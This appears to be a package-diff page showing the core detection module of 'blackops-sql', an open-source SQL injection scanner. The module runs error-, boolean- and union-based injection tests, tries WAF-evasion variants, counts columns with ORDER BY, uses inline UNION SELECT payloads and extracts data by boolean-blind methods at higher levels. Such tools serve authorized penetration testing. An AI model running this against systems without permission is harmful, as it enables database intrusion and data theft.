PyPI - blackops-sql - Versions diffs - 0.1.6__py3-none-any.whl - Mend

blackops-sql 0.1.6__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (29) hide show

blackops_sql-0.1.6.dist-info/METADATA +250 -0
blackops_sql-0.1.6.dist-info/RECORD +29 -0
blackops_sql-0.1.6.dist-info/WHEEL +4 -0
blackops_sql-0.1.6.dist-info/entry_points.txt +2 -0
blackops_sql-0.1.6.dist-info/licenses/LICENSE +661 -0
blackops_sql-0.1.6.dist-info/licenses/NOTICE +27 -0
blackopssql/__init__.py +111 -0
blackopssql/__main__.py +287 -0
blackopssql/_cli/__init__.py +0 -0
blackopssql/_cli/args.py +229 -0
blackopssql/_cli/summary.py +216 -0
blackopssql/engine/__init__.py +35 -0
blackopssql/engine/_scanner/__init__.py +0 -0
blackopssql/engine/_scanner/active/__init__.py +526 -0
blackopssql/engine/_scanner/active/_helpers.py +301 -0
blackopssql/engine/_scanner/blind.py +315 -0
blackopssql/engine/_scanner/extract.py +302 -0
blackopssql/engine/_scanner/options.py +96 -0
blackopssql/engine/_scanner/passive.py +86 -0
blackopssql/engine/_scanner/payloads/__init__.py +80 -0
blackopssql/engine/_scanner/pipeline.py +547 -0
blackopssql/engine/_scanner/stacked.py +131 -0
blackopssql/engine/crawler.py +7 -0
blackopssql/engine/http/__init__.py +0 -0
blackopssql/engine/http/injector.py +10 -0
blackopssql/engine/http/waf_detect.py +51 -0
blackopssql/engine/log.py +7 -0
blackopssql/engine/reporter.py +208 -0
blackopssql/engine/scanner.py +95 -0

blackopssql/engine/_scanner/active/__init__.py ADDED Viewed

@@ -0,0 +1,526 @@
+# SPDX-License-Identifier: AGPL-3.0-or-later
+# Copyright (c) 2026 CommonHuman-Lab
+"""
+BlackOpsSQL — engine/_scanner/active/
+Error-based, boolean-based, and union-based SQLi detection.
+Sub-modules:
+  - _helpers : HTTP fetch helper and response comparison utilities
+All detection logic (scan_param, _test_error_based, _test_boolean, _test_union,
+_detect_db_error, _find_column_count) lives here in __init__.py so that
+references can be patched by tests via the package namespace.
+"""
+from __future__ import annotations
+import re
+from typing import Any, Dict, List, Optional, Tuple
+from ...log import get_logger
+from ...reporter import ErrorBasedFinding, BooleanFinding, UnionFinding, ExtractionFinding, ScanResult
+from ...http.injector import Injector
+from ...http.waf_detect import EVASION_NONE
+from ..options import ScanOptions
+from ..payloads import (
+    DB_ERROR_PATTERNS,
+    apply_evasion,
+    get_error_payloads,
+    get_boolean_pairs,
+    get_db_contents_payloads,
+    get_enum_payloads,
+    make_marker,
+    order_by_probes,
+    union_null_probes,
+)
+from ._helpers import (
+    _fetch,
+    _diff_score,
+    _len_ratio,
+    _has_stable_boolean_signal,
+    _extract_marker,
+    _is_path_reflected,
+    strip_status_sentinel,
+    _BOOL_CONFIRM_THRESHOLD,
+    _BOOL_LIKELY_THRESHOLD,
+    _BOOL_LEN_RATIO_THRESHOLD,
+)
+logger = get_logger("blackopssql.active")
+# ---------------------------------------------------------------------------
+# Public entry point
+# ---------------------------------------------------------------------------
+def scan_param(
+    surface: Dict[str, Any],
+    evasions: List[str],
+    opts: ScanOptions,
+    injector: Injector,
+    result: ScanResult,
+) -> None:
+    """
+    Test a single injectable surface for SQLi.
+    surface keys: url, method, params, single_param
+    """
+    url       = surface["url"]
+    method    = surface["method"]
+    params    = surface["params"]
+    param     = surface["single_param"]
+    json_body  = surface.get("json_body", False)
+    path_index = surface.get("path_index", 0)
+    second_url = getattr(opts, "second_url", "")
+    # Fetch a clean baseline using the original param value (not empty string),
+    # so the baseline represents normal application behaviour for a valid input.
+    baseline = _fetch(injector, url, method, params, param, None,
+                      second_url=second_url, json_body=json_body, path_index=path_index)
+    if baseline is None:
+        return
+    _surface_error_found   = False
+    _surface_boolean_found = False
+    _surface_union_found   = False
+    for evasion in (evasions if evasions else [EVASION_NONE]):
+        if opts.use_error and not _surface_error_found:
+            _before = len(result.error_based)
+            _test_error_based(url, method, params, param, evasion, opts, injector, result,
+                              second_url, json_body, path_index)
+            _surface_error_found = len(result.error_based) > _before
+        # Skip boolean if error or union already gave a definitive confirmation —
+        # both are cheaper to detect and leave no ambiguity about injectability.
+        _definitive_hit = _surface_error_found or _surface_union_found
+        if opts.use_boolean and not _definitive_hit and not _surface_boolean_found:
+            _before = len(result.boolean_based)
+            _test_boolean(url, method, params, param, baseline, evasion, opts, injector, result,
+                          second_url, json_body, path_index)
+            _surface_boolean_found = len(result.boolean_based) > _before
+        if opts.use_union and not _surface_union_found:
+            _before = len(result.union_based)
+            _test_union(url, method, params, param, evasion, opts, injector, result,
+                        second_url, json_body, path_index)
+            _surface_union_found = len(result.union_based) > _before
+        # Stop escalating evasions as soon as any technique confirms injection.
+        # Once injectable under one evasion, further WAF-bypass attempts are wasted.
+        if _surface_error_found or _surface_boolean_found or _surface_union_found:
+            break
+    # Level 3: run extended payload sets (db_contents + enum) via error channel
+    if opts.level >= 3 and opts.use_error:
+        evasion = evasions[0] if evasions else EVASION_NONE
+        _dbms = result.dbms_detected or opts.dbms
+        _extended = (
+            get_db_contents_payloads(_dbms, "tables")
+            + get_db_contents_payloads(_dbms, "columns")
+            + get_enum_payloads("version")
+            + get_enum_payloads("current_user")
+            + get_enum_payloads("current_database")
+        )
+        for raw_payload in _extended:
+            payload = apply_evasion(raw_payload, evasion)
+            resp = _fetch(injector, url, method, params, param, payload,
+                          second_url=second_url, json_body=json_body, path_index=path_index)
+            if resp is None:
+                continue
+            _resp_l3 = resp
+            for _v in (payload, payload.upper(), payload.lower()):
+                _resp_l3 = _resp_l3.replace(_v, "")
+            dbms_hit, evidence = _detect_db_error(_resp_l3)
+            if dbms_hit:
+                result.append_error_based(ErrorBasedFinding(
+                    url=url, parameter=param, method=method,
+                    payload=payload, dbms=dbms_hit, evidence=evidence,
+                ))
+# ---------------------------------------------------------------------------
+# Error-based detection
+# ---------------------------------------------------------------------------
+def _detect_db_error(body: str) -> Tuple[str, str]:
+    """
+    Scan *body* for DB error patterns.
+    Returns (dbms_name, evidence_snippet) or ("", "").
+    """
+    body = strip_status_sentinel(body)
+    body_lower = body.lower()
+    # Check specific DBMSes first, then generic
+    for dbms in ("mysql", "mariadb", "mssql", "postgres", "sqlite", "oracle", "generic"):
+        for pattern in DB_ERROR_PATTERNS[dbms]:
+            m = re.search(pattern, body_lower)
+            if m:
+                start = max(0, m.start() - 30)
+                end   = min(len(body), m.end() + 80)
+                return dbms, body[start:end].strip()
+    return "", ""
+def _test_error_based(
+    url: str, method: str, params: Dict[str, str], param: str,
+    evasion: str, opts: ScanOptions, injector: Injector, result: ScanResult,
+    second_url: str = "", json_body: bool = False, path_index: int = 0,
+) -> None:
+    payloads = get_error_payloads(opts.dbms, opts.risk, opts.level)
+    for raw_payload in payloads:
+        payload = apply_evasion(raw_payload, evasion)
+        resp = _fetch(injector, url, method, params, param, payload,
+                      second_url=second_url, json_body=json_body, path_index=path_index)
+        if resp is None:
+            continue
+        # Strip the injected payload from the response before checking for DB
+        # errors.  Apps that reflect the payload in their own error message
+        # (e.g. "Invalid symbol: ' AND EXTRACTVALUE(...)")
+        _resp_clean = resp
+        for _v in (payload, payload.upper(), payload.lower()):
+            _resp_clean = _resp_clean.replace(_v, "")
+        dbms, evidence = _detect_db_error(_resp_clean)
+        if dbms:
+            logger.finding(
+                "Error-based SQLi: %s param=%s payload=%s dbms=%s",
+                url, param, payload, dbms,
+            )
+            result.append_error_based(ErrorBasedFinding(
+                url=url,
+                parameter=param,
+                method=method,
+                payload=payload,
+                dbms=dbms,
+                evidence=evidence,
+            ))
+            # Auto-detect DBMS for the rest of the scan
+            if result.dbms_detected is None and dbms != "generic":
+                result.dbms_detected = dbms
+            # One confirmed finding per param is enough
+            return
+# ---------------------------------------------------------------------------
+# Boolean-based detection
+# ---------------------------------------------------------------------------
+def _test_boolean(
+    url: str, method: str, params: Dict[str, str], param: str,
+    baseline: str, evasion: str, opts: ScanOptions, injector: Injector, result: ScanResult,
+    second_url: str = "", json_body: bool = False, path_index: int = 0,
+) -> None:
+    pairs = get_boolean_pairs(opts.risk, opts.level)
+    for raw_true, raw_false in pairs:
+        pt = apply_evasion(raw_true,  evasion)
+        pf = apply_evasion(raw_false, evasion)
+        resp_true  = _fetch(injector, url, method, params, param, pt,
+                            second_url=second_url, json_body=json_body, path_index=path_index)
+        resp_false = _fetch(injector, url, method, params, param, pf,
+                            second_url=second_url, json_body=json_body, path_index=path_index)
+        if resp_true is None or resp_false is None:
+            continue
+        score = _diff_score(resp_true, resp_false)
+        baseline_score = _diff_score(baseline, resp_true)
+        # Also check content-length divergence — catches tiny textual diffs
+        len_ratio = _len_ratio(resp_true, resp_false)
+        baseline_len_ratio = _len_ratio(baseline, resp_true)
+        # Stable-baseline boolean signal: true response matches baseline
+        # while false response diverges — catches single-line blind SQLi
+        has_stable_signal = _has_stable_boolean_signal(baseline, resp_true, resp_false)
+        stable_baseline = baseline_score <= _BOOL_LIKELY_THRESHOLD and baseline_len_ratio <= _BOOL_LEN_RATIO_THRESHOLD
+        is_likely    = (score >= _BOOL_LIKELY_THRESHOLD
+                        or (stable_baseline and len_ratio >= _BOOL_LEN_RATIO_THRESHOLD)
+                        or has_stable_signal)
+        is_confirmed = (score >= _BOOL_CONFIRM_THRESHOLD
+                        or (stable_baseline and len_ratio >= _BOOL_LEN_RATIO_THRESHOLD * 2)
+                        or has_stable_signal)
+        # Ignore if true response is also different from baseline (unstable target)
+        if not stable_baseline and not has_stable_signal and not is_likely:
+            continue
+        if is_likely:
+            confirmed = is_confirmed
+            logger.finding(
+                "Boolean SQLi: %s param=%s score=%.2f len_ratio=%.4f confirmed=%s",
+                url, param, score, len_ratio, confirmed,
+            )
+            result.append_boolean(BooleanFinding(
+                url=url,
+                parameter=param,
+                method=method,
+                payload_true=pt,
+                payload_false=pf,
+                diff_score=score,
+                confirmed=confirmed,
+                evidence=strip_status_sentinel(resp_true)[:200],
+            ))
+            # Level 3: attempt data extraction via binary-search char extractor
+            if opts.level >= 3 and confirmed:
+                from ..extract import extract_value, get_extraction_targets
+                _dbms = getattr(opts, "dbms", "auto")
+                _surface = {"url": url, "method": method, "params": params,
+                             "single_param": param,
+                             "json_body": json_body, "path_index": path_index}
+                for _label, _expr in get_extraction_targets(_dbms):
+                    _extracted = extract_value(
+                        expr=_expr,
+                        surface=_surface,
+                        evasions=[evasion],
+                        opts=opts,
+                        injector=injector,
+                        baseline=baseline,
+                        mode="boolean",
+                    )
+                    if _extracted:
+                        logger.finding("Extracted via boolean blind: %s param=%s %s=%s",
+                                       url, param, _label, _extracted)
+                        result.append_extraction(ExtractionFinding(
+                            url=url, parameter=param, method=method,
+                            expr=_expr, value=_extracted, mode="boolean",
+                        ))
+            return  # one finding per param
+# ---------------------------------------------------------------------------
+# Union-based detection
+# ---------------------------------------------------------------------------
+def _test_union(
+    url: str, method: str, params: Dict[str, str], param: str,
+    evasion: str, opts: ScanOptions, injector: Injector, result: ScanResult,
+    second_url: str = "", json_body: bool = False, path_index: int = 0,
+) -> None:
+    # Step 1: find column count via ORDER BY
+    max_cols = getattr(opts, "max_union_cols", 20)
+    col_count = _find_column_count(url, method, params, param, evasion, injector,
+                                   second_url, max_cols, json_body, path_index)
+    if col_count is None:
+        return
+    # Step 2: find a reflected column
+    marker = make_marker()
+    _lite = (evasion == EVASION_NONE or evasion == "none")
+    probes = union_null_probes(col_count, marker, lite=_lite)
+    _first_http500_payload: Optional[str] = None  # best candidate for HTTP-500 signal
+    for raw_payload in probes:
+        payload = apply_evasion(raw_payload, evasion)
+        resp = _fetch(injector, url, method, params, param, payload,
+                      second_url=second_url, json_body=json_body, path_index=path_index)
+        if resp is None:
+            continue
+        # Case-insensitive check: servers may uppercase the injected value (e.g. .upper() calls)
+        _resp_lower   = resp.lower()
+        _marker_lower = marker.lower()
+        if _marker_lower in _resp_lower:
+            # Resolve the actual case form as it appears in the response
+            _idx = _resp_lower.index(_marker_lower)
+            found_marker = resp[_idx : _idx + len(marker)]
+            # Guard 1: DB error reflection
+            err_dbms, _ = _detect_db_error(resp)
+            if err_dbms:
+                logger.debug(
+                    "Union probe: marker found but response also has DB error — "
+                    "likely error-reflected payload, skipping param=%s payload=%s",
+                    param, payload,
+                )
+                continue
+            # Guard 2: URL/path reflection
+            if _is_path_reflected(resp, found_marker, payload):
+                logger.debug(
+                    "Union probe: marker found but appears to be URL/path reflection, "
+                    "skipping param=%s payload=%s",
+                    param, payload,
+                )
+                continue
+            _disp = re.sub(r"BreachSQL_[A-Za-z0-9]+", "<marker>", payload, flags=re.IGNORECASE)
+            _disp = re.sub(r"\bchar\(\d[\d,]+\)", "char(<marker>)", _disp)
+            logger.finding(
+                "Union SQLi: %s param=%s cols=%d payload=%s",
+                url, param, col_count, _disp,
+            )
+            result.append_union(UnionFinding(
+                url=url,
+                parameter=param,
+                method=method,
+                payload=payload,
+                column_count=col_count,
+                extracted=_extract_marker(resp, found_marker),
+            ))
+            return
+        # HTTP 500 from a UNION probe means the injection was executed but a
+        # downstream template or type-cast crashed on the injected value.
+        # Track the first such probe; report it only if no direct reflection is found.
+        if "__HTTP_STATUS_500__" in resp and _first_http500_payload is None:
+            _first_http500_payload = payload
+    # No direct marker reflection found — fall back to HTTP-500 confirmation
+    if _first_http500_payload is not None:
+        _disp = re.sub(r"BreachSQL_[A-Za-z0-9]+", "<marker>", _first_http500_payload, flags=re.IGNORECASE)
+        logger.finding(
+            "Union SQLi (HTTP 500 — template crash): %s param=%s cols=%d payload=%s",
+            url, param, col_count, _disp,
+        )
+        result.append_union(UnionFinding(
+            url=url,
+            parameter=param,
+            method=method,
+            payload=_first_http500_payload,
+            column_count=col_count,
+            extracted="[HTTP 500 — template crash on injected value]",
+        ))
+def _find_column_count(
+    url: str, method: str, params: Dict[str, str], param: str,
+    evasion: str, injector: Injector, second_url: str = "",
+    max_cols: int = 20, json_body: bool = False, path_index: int = 0,
+) -> Optional[int]:
+    """Determine column count using ORDER BY N probes.
+    Probes are generated in pairs (two comment styles per N).  We track the
+    last N that did NOT produce a DB error or empty/changed response.  As soon
+    as a probe causes the page to lose its normal content (error OR blank
+    result), we know N exceeds the real column count.
+    DVWA-style apps return an empty body (no data rows) rather than a DB error
+    when ORDER BY N exceeds the column count, so we detect both cases.
+    """
+    import re as _re
+    _lite = (evasion == EVASION_NONE or evasion == "none")
+    probes = order_by_probes(max_cols=max_cols, lite=_lite)
+    last_ok: Optional[int] = None
+    # Fetch a 'known-good' baseline to detect content disappearance
+    baseline_resp = _fetch(injector, url, method, params, param, None,
+                           second_url=second_url, json_body=json_body, path_index=path_index)
+    baseline_words: set = set()
+    if baseline_resp:
+        baseline_words = set(w for w in baseline_resp.split() if len(w) > 4)
+    # Per-prefix first-seen response — used as reference when the payload changes
+    # the injection context
+    prefix_baseline: Dict[str, str] = {}
+    def _get_prefix(payload: str) -> str:
+        m2 = _re.match(r"^(\d+|['\"]?\)*)", payload)
+        return m2.group(1) if m2 else ""
+    def _response_looks_good(resp: str, prefix: str) -> bool:
+        pb = prefix_baseline.get(prefix)
+        if pb is None:
+            return True
+        ref_words = set(w for w in pb.split() if len(w) > 4)
+        if not ref_words:
+            return True
+        resp_words = set(w for w in resp.split() if len(w) > 4)
+        overlap = len(ref_words & resp_words) / max(len(ref_words), 1)
+        return overlap >= 0.80
+    seen_n: set = set()
+    prefix_last_ok: Dict[str, int] = {}
+    prefix_overflow: set = set()
+    for raw_payload in probes:
+        m = _re.search(r"ORDER BY (\d+)", raw_payload, _re.IGNORECASE)
+        if not m:
+            continue
+        n = int(m.group(1))
+        prefix = _get_prefix(raw_payload)
+        if prefix in prefix_overflow:
+            continue
+        payload = apply_evasion(raw_payload, evasion)
+        resp = _fetch(injector, url, method, params, param, payload,
+                      second_url=second_url, json_body=json_body, path_index=path_index)
+        if resp is None:
+            continue
+        _, err_evidence = _detect_db_error(resp)
+        looks_ok = not err_evidence and _response_looks_good(resp, prefix)
+        if looks_ok:
+            if prefix not in prefix_baseline:
+                prefix_baseline[prefix] = resp
+            prefix_last_ok[prefix] = n
+            last_ok = max(last_ok or 0, n) or None
+            seen_n.add(n)
+        else:
+            p_last = prefix_last_ok.get(prefix)
+            if p_last is not None and n > p_last:
+                prefix_overflow.add(prefix)
+        # Early exit: once we have overflow confirmation for all seen prefixes
+        # that have at least one OK probe, we have enough information.
+        if prefix_overflow and all(
+            p in prefix_overflow
+            for p in prefix_baseline
+        ):
+            break
+    if prefix_overflow:
+        best = max(
+            (prefix_last_ok[p] for p in prefix_overflow if p in prefix_last_ok),
+            default=None,
+        )
+        if best is not None:
+            return best
+    # Fallback: ORDER BY detection failed because the app swallows DB errors
+    # (try/except around the query).  Use UNION probes instead: when the column
+    # count is correct the SQL is valid and the row is returned.
+    if (last_ok is None or last_ok == max_cols) and baseline_resp is not None:
+        _fb_marker = "BSCNT_PROBE"  # short, all-caps survives .upper() on the server
+        # Two injection styles cover the common quoting contexts; exit on first hit.
+        _fb_fmts = (
+            f"' UNION SELECT {{}}-- -",
+            f" UNION SELECT {{}}-- -",
+            f"0 UNION SELECT {{}}-- -",
+        )
+        for _n in range(1, max_cols + 1):
+            _inner = ",".join([f"'{_fb_marker}'"] * _n)
+            for _fmt in _fb_fmts:
+                _pl   = apply_evasion(_fmt.format(_inner), evasion)
+                _resp = _fetch(injector, url, method, params, param, _pl,
+                               second_url=second_url, json_body=json_body,
+                               path_index=path_index)
+                if _resp is None:
+                    continue
+                # Direct reflection: marker appears in rendered text
+                if _fb_marker.lower() in _resp.lower():
+                    return _n
+                # Template crash: UNION was syntactically valid but a float-format
+                # Jinja filter blew up on a NULL/string value — still a hit.
+                if "__HTTP_STATUS_500__" in _resp:
+                    return _n
+    return last_ok
+__all__ = [
+    "scan_param",
+    # helpers
+    "_fetch",
+    "_diff_score",
+    "_len_ratio",
+    "_has_stable_boolean_signal",
+    "_extract_marker",
+    "_is_path_reflected",
+    "strip_status_sentinel",
+    # detection
+    "_detect_db_error",
+    "_test_error_based",
+    "_test_boolean",
+    "_test_union",
+    "_find_column_count",
+    # re-exported from payloads (for backward compat / patching)
+    "make_marker",
+]